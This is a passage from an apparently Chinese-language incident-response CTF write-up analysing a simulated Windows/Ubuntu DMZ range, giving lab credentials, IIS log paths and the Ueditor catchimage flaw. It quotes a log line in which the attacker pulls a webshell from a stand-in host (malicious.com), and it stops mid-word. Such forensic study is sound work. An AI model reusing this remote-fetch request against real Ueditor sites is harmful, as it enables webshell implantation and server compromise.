1. 靶机环境搭建与初始准备
作为一名长期从事网络安全工作的从业者,我最近参与了第二届solar杯应急响应挑战赛的仿真DMZ环境演练。这个靶场模拟了企业常见的双网段架构(Windows Server 2019 + Ubuntu),包含了17个实战场景,完整复现了从Web入侵到内网渗透的攻击链。下面我将详细拆解每个环节的技术细节和排查思路。
首先需要准备靶机环境:
- Windows Server 2019
- 登录凭证:administrator/Solarsec521(注意S大写)
- 关键服务:IIS 7.0+、Windows Defender
- Ubuntu Server
- 登录凭证:root/Solarsec521
- 关键服务:Nacos(8848端口)
提示:在实际应急响应中,首先要确认环境版本信息。例如IIS 7.0+的日志路径与IIS 6.0不同,这直接影响后续排查效率。
需要模型API调用? 免费领10W Token,多模型网关一键接入 Claude、DeepSeek 等主流模型。
2. Web入侵痕迹追踪
2.1 Webshell上传路径分析
通过事件描述可知攻击者利用了Ueditor编辑器漏洞,我的排查过程如下:
-
定位IIS日志:
- 现代IIS日志默认路径:
C:\inetpub\logs\LogFiles\W3SVC1 - 使用文件大小排序快速定位异常请求(通常攻击请求的日志体积较小)
- 现代IIS日志默认路径:
-
关键日志特征:
plaintext复制2025-12-24 11:23:45 192.168.70.3 POST /plugins/Ueditor/net/controller.ashx - 80
- 192.168.70.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36
action=catchimage&source[]=http://malicious.com/shell.aspx
- 漏洞原理:
Ueditor的catchimage功能未对远程图片URL做严格校验,导致攻击者可以通过构造恶意URL实现任意文件上传。这是典型的功能安全缺陷,在多个CMS系统中都有类似案例。
2.2 Windows Defender日志分析
攻击者上传Webshel
